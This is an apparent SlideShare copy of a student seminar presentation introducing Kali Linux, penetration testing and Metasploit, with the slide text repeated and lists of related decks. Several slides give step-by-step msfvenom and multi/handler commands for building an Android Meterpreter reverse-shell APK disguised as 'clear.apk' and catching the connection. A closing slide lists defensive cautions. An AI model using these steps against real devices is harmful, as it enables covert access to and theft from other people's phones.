SlideShare a Scribd company logo
2
Most read
9
Most read
12
Most read
METASPLOIT
GUIDE IN CHARGE
Mr.JINSONDEVIS
PRESENTED BY
HENEL PJ
MCA LE S3
ROLLNO 23
CONTENTS
 Introduction
Kali Linux
Penetration testing
 Metasploit
Introduction to Metasploit
Advantages & Disadvantages
 Steps to Hacking Android with Metasploit
Payload File Creation
Sending payload To the Target
Running Metasploit and AttackerSetup
Commands to exploits victim’sAndroid
 Future Scope
 Conclusion
 References
INTRODUCTION ON KALI LINUX
Debian-based Linuxdistribution aimed at advanced
PenetrationTestingand SecurityAuditing.
ReleaseDate: March 13th, 2013.
Security-focused versionof Linuxthat offers a large
numberof tools to seekout weaknessesand secure
your network.
Kali containsseveraltools
Information security tasks
PenetrationTesting,Securityresearch
Computer Forensicsand ReverseEngineering
Developers: Mati Aharoni, DevonKearnsand
Raphael Hertzog of offensive security.
Open source
600 penetration testing tools + Applications
Platforms - x86, x86-64, armel
LatestRelease– Kali 2017.3 – 21st November, 2017
Easyupgrade to future versions
Also called pentesting
Testing a computer system/network /Web application
to find vulnerabilities.
Benefits:
Intelligently manage vulnerabilities
Avoid the cost of network downtime
Meet regulatoryrequirements
Preserve corporate image and customer loyalty
Penetration Testing
MAIN TERMS
EXPLOIT- a piece of code written to take advantage of a
particular vulnerability inthe system.
PAYLOAD- simplescriptsthat the hackersutilize to interact with a
hacked system.
LHOST- TheIPaddress youwant your listener to bind to.
LPORT- Theport youwantyour listener to bind to.
Meterpreter - advanced, dynamically extensible payload that
uses in memorydll injection & extended over the n/w at runtime.
METASPLOIT
penetration testing platform that enables to find,
exploit, andvalidate vulnerabilities.
Author:Rapid7
License: BSD-3-clause
Twoversions:commercial and free(Community)
edition.
hardware requirements to install Metasploit
 1 GB RAM available
 1 GB+ available diskspace
 2 GHz+ processor
METASPLOITINTERFACES
Metasploit can be used either with Console,
command prompt or with GUI.
Msfconsole –part of metasploitframework,
provide interface with all options.
Msfcli –runs directly from the commandline&
puts priority on scripting.
Armitage –GUI for metasploit framework.
Advantages
 Open source
 Frequently updated
 Huge community
 Easy to deployuser specific exploit
Disadvantages
 Difficult to learn
 Can crash your system if not used wisely
 Requires deep knowledge for exploit development
HACKINGWIINDOWSWITH
METASPLOIT
STEP1:OPEN THE METASPLOIT CONSOLE IN KALI
Path:Applications → Exploitation Tools → Metasploit
Fig: Metasploit console
STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL
FOR CREATING THE PAYLOAD FILE
msf > msfvenom –p android/meterpreter/reverse_tcp
LHOST=192.168.43.207 LPORT=6060 R > clear.apk
STEP 3: Install apk
STEP 4: USE THE “exploit/multi/handler”
Payload Handler is a module that provides all the features of the
metasploit payload system to exploit. msf > use
exploit/multi/handler
STEP 5: SET THE PAYLOAD
msf exploit(multi/handler) > set payload
android/meterpreter/reverse_tcp
STEP 6: SET THE LOCAL HOST
msf exploit(multi/handler) > set LHOST 192.168.43.207
STEP 7: SET THE LOCAL PORT
msf exploit(multi/handler) > set LPORT 6060
Metasploit
STEP 8: RUN THE COMMAND “ exploit ”
msf exploit(multi/handler) > exploit
FUTURE SCOPE
Beingopen sourceframework, it hasgot huge
community support.
Inorder to face newsecurity challengesMetasploit
isfrequently updated for zero-day vulnerabilities.
More and moreexploits will be made available to
its database for users.
Upcomingversionswill be moreefficient, user-
friendly, GUI-based, web-based with customizing
options along with its interactive console.
CONCLUSION
The backdoor application when installed and turned on the
mobile allows attacker to read, write and modify data. Cautions are.
Never permanently enable installing of Apps from “Unknown
sources “.
Never take your phone to important meetings or anywhere you
don't want people listening.
Keep your Android up to date.
Installing antivirus software on your Android device.
REFERENCE
www.metasploit.com
www.rapid7.com
https://tools.kali.org/exploitation-tools/metasploit-
framework
www.securitytube.net
www.google.com
www.youtube.com
THANK YOU…………

More Related Content

PPTX
Metasploit framework in Network Security
PPTX
Metasploit
PPTX
Introduction To Exploitation & Metasploit
PPTX
Metasploit framwork
PPTX
OSI and TCPIP Model
PPTX
Understanding NMAP
PPT
Bad news messages
PPTX
Hypervisor
Metasploit framework in Network Security
Metasploit
Introduction To Exploitation & Metasploit
Metasploit framwork
OSI and TCPIP Model
Understanding NMAP
Bad news messages
Hypervisor

What's hot (20)

PPTX
Introduction to Metasploit
 
PPTX
Metasploit (Module-1) - Getting Started With Metasploit
PDF
Metaploit
PDF
How MITRE ATT&CK helps security operations
PPTX
Metasploit seminar
PDF
Nmap Basics
PPTX
PPTX
Introduction to penetration testing
PPTX
Kali linux.ppt
PPTX
Penetration testing reporting and methodology
PPTX
Finalppt metasploit
PPTX
PPTX
Session Hijacking ppt
PPT
Penetration Testing Basics
PPTX
Wireshark
PPTX
John the ripper & hydra password cracking tool
PPTX
Nessus-Vulnerability Tester
PPTX
Introduction to Malware Analysis
Introduction to Metasploit
 
Metasploit (Module-1) - Getting Started With Metasploit
Metaploit
How MITRE ATT&CK helps security operations
Metasploit seminar
Nmap Basics
Introduction to penetration testing
Kali linux.ppt
Penetration testing reporting and methodology
Finalppt metasploit
Session Hijacking ppt
Penetration Testing Basics
Wireshark
John the ripper & hydra password cracking tool
Nessus-Vulnerability Tester
Introduction to Malware Analysis
Ad

Similar to Metasploit (20)

PPTX
Lifnaaaaaa e
PDF
Exploits Attack on Windows Vulnerabilities
PDF
24 33 -_metasploit
PPTX
Intro to exploits in metasploitand payloads in msfvenom
PPT
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
PDF
ENPM808 Independent Study Final Report - amaster 2019
DOCX
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
DOCX
Backtrack Manual Part6
PPT
Metasploit-TOI-Ebryx-PVT-Ltd
DOCX
Backtrack Manual Part7
DOC
Exploit Frameworks
PPTX
Introduction of Metasploit and task.pptx
PDF
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
PPTX
Pentesting with linux
DOCX
unit 2 Intoduction to Tools and Platforms.docx
PDF
Unveiling-Patchwork
PPTX
The FatRat
PPT
Threats, Vulnerabilities & Security measures in Linux
Lifnaaaaaa e
Exploits Attack on Windows Vulnerabilities
24 33 -_metasploit
Intro to exploits in metasploitand payloads in msfvenom
[null]Metapwn - Pwn at a puff by Prajwal Panchmahalkar
ENPM808 Independent Study Final Report - amaster 2019
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx
Backtrack Manual Part6
Metasploit-TOI-Ebryx-PVT-Ltd
Backtrack Manual Part7
Exploit Frameworks
Introduction of Metasploit and task.pptx
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
Pentesting with linux
unit 2 Intoduction to Tools and Platforms.docx
Unveiling-Patchwork
The FatRat
Threats, Vulnerabilities & Security measures in Linux
Ad

Recently uploaded (20)

PPTX
Introduction to cybersecurity and digital nettiquette
PPTX
E -tech empowerment technologies PowerPoint
PPTX
artificial intelligence overview of it and more
PPT
415456121-Jiwratrwecdtwfdsfwgdwedvwe dbwsdjsadca-EVN.ppt
PPTX
newyork.pptxirantrafgshenepalchinachinane
PPTX
IPCNA VIRTUAL CLASSES INTERMEDIATE 6 PROJECT.pptx
PPTX
artificialintelligenceai1-copy-210604123353.pptx
PDF
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
DOC
Rose毕业证学历认证,利物浦约翰摩尔斯大学毕业证国外本科毕业证
PPTX
Layers_of_the_Earth_Grade7.pptx class by
PDF
The Ikigai Template _ Recalibrate How You Spend Your Time.pdf
PDF
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
PDF
Exploring VPS Hosting Trends for SMBs in 2025
PDF
simpleintnettestmetiaerl for the simple testint
PPT
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
PPT
isotopes_sddsadsaadasdasdasdasdsa1213.ppt
PPTX
Internet Safety for Seniors presentation
PPTX
Database Information System - Management Information System
PDF
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
PPTX
SAP Ariba Sourcing PPT for learning material
Introduction to cybersecurity and digital nettiquette
E -tech empowerment technologies PowerPoint
artificial intelligence overview of it and more
415456121-Jiwratrwecdtwfdsfwgdwedvwe dbwsdjsadca-EVN.ppt
newyork.pptxirantrafgshenepalchinachinane
IPCNA VIRTUAL CLASSES INTERMEDIATE 6 PROJECT.pptx
artificialintelligenceai1-copy-210604123353.pptx
📍 LABUAN4D EXCLUSIVE SERVER STAR GAMING ASIA NO.1 TERPOPULER DI INDONESIA ! 🌟
Rose毕业证学历认证,利物浦约翰摩尔斯大学毕业证国外本科毕业证
Layers_of_the_Earth_Grade7.pptx class by
The Ikigai Template _ Recalibrate How You Spend Your Time.pdf
mera desh ae watn.(a source of motivation and patriotism to the youth of the ...
Exploring VPS Hosting Trends for SMBs in 2025
simpleintnettestmetiaerl for the simple testint
FIRE PREVENTION AND CONTROL PLAN- LUS.FM.MQ.OM.UTM.PLN.00014.ppt
isotopes_sddsadsaadasdasdasdasdsa1213.ppt
Internet Safety for Seniors presentation
Database Information System - Management Information System
SlidesGDGoCxRAIS about Google Dialogflow and NotebookLM.pdf
SAP Ariba Sourcing PPT for learning material

Metasploit

  • 1. METASPLOIT GUIDE IN CHARGE Mr.JINSONDEVIS PRESENTED BY HENEL PJ MCA LE S3 ROLLNO 23
  • 2. CONTENTS  Introduction Kali Linux Penetration testing  Metasploit Introduction to Metasploit Advantages & Disadvantages  Steps to Hacking Android with Metasploit Payload File Creation Sending payload To the Target Running Metasploit and AttackerSetup Commands to exploits victim’sAndroid  Future Scope  Conclusion  References
  • 3. INTRODUCTION ON KALI LINUX Debian-based Linuxdistribution aimed at advanced PenetrationTestingand SecurityAuditing. ReleaseDate: March 13th, 2013. Security-focused versionof Linuxthat offers a large numberof tools to seekout weaknessesand secure your network. Kali containsseveraltools Information security tasks PenetrationTesting,Securityresearch Computer Forensicsand ReverseEngineering
  • 4. Developers: Mati Aharoni, DevonKearnsand Raphael Hertzog of offensive security. Open source 600 penetration testing tools + Applications Platforms - x86, x86-64, armel LatestRelease– Kali 2017.3 – 21st November, 2017 Easyupgrade to future versions
  • 5. Also called pentesting Testing a computer system/network /Web application to find vulnerabilities. Benefits: Intelligently manage vulnerabilities Avoid the cost of network downtime Meet regulatoryrequirements Preserve corporate image and customer loyalty Penetration Testing
  • 6. MAIN TERMS EXPLOIT- a piece of code written to take advantage of a particular vulnerability inthe system. PAYLOAD- simplescriptsthat the hackersutilize to interact with a hacked system. LHOST- TheIPaddress youwant your listener to bind to. LPORT- Theport youwantyour listener to bind to. Meterpreter - advanced, dynamically extensible payload that uses in memorydll injection & extended over the n/w at runtime.
  • 7. METASPLOIT penetration testing platform that enables to find, exploit, andvalidate vulnerabilities. Author:Rapid7 License: BSD-3-clause Twoversions:commercial and free(Community) edition. hardware requirements to install Metasploit  1 GB RAM available  1 GB+ available diskspace  2 GHz+ processor
  • 8. METASPLOITINTERFACES Metasploit can be used either with Console, command prompt or with GUI. Msfconsole –part of metasploitframework, provide interface with all options. Msfcli –runs directly from the commandline& puts priority on scripting. Armitage –GUI for metasploit framework.
  • 9. Advantages  Open source  Frequently updated  Huge community  Easy to deployuser specific exploit Disadvantages  Difficult to learn  Can crash your system if not used wisely  Requires deep knowledge for exploit development
  • 10. HACKINGWIINDOWSWITH METASPLOIT STEP1:OPEN THE METASPLOIT CONSOLE IN KALI Path:Applications → Exploitation Tools → Metasploit
  • 12. STEP 2: TYPE THE FOLLOWING COMMAND IN THE TERMINAL FOR CREATING THE PAYLOAD FILE msf > msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.43.207 LPORT=6060 R > clear.apk
  • 14. STEP 4: USE THE “exploit/multi/handler” Payload Handler is a module that provides all the features of the metasploit payload system to exploit. msf > use exploit/multi/handler STEP 5: SET THE PAYLOAD msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp STEP 6: SET THE LOCAL HOST msf exploit(multi/handler) > set LHOST 192.168.43.207 STEP 7: SET THE LOCAL PORT msf exploit(multi/handler) > set LPORT 6060
  • 16. STEP 8: RUN THE COMMAND “ exploit ” msf exploit(multi/handler) > exploit
  • 17. FUTURE SCOPE Beingopen sourceframework, it hasgot huge community support. Inorder to face newsecurity challengesMetasploit isfrequently updated for zero-day vulnerabilities. More and moreexploits will be made available to its database for users. Upcomingversionswill be moreefficient, user- friendly, GUI-based, web-based with customizing options along with its interactive console.
  • 18. CONCLUSION The backdoor application when installed and turned on the mobile allows attacker to read, write and modify data. Cautions are. Never permanently enable installing of Apps from “Unknown sources “. Never take your phone to important meetings or anywhere you don't want people listening. Keep your Android up to date. Installing antivirus software on your Android device.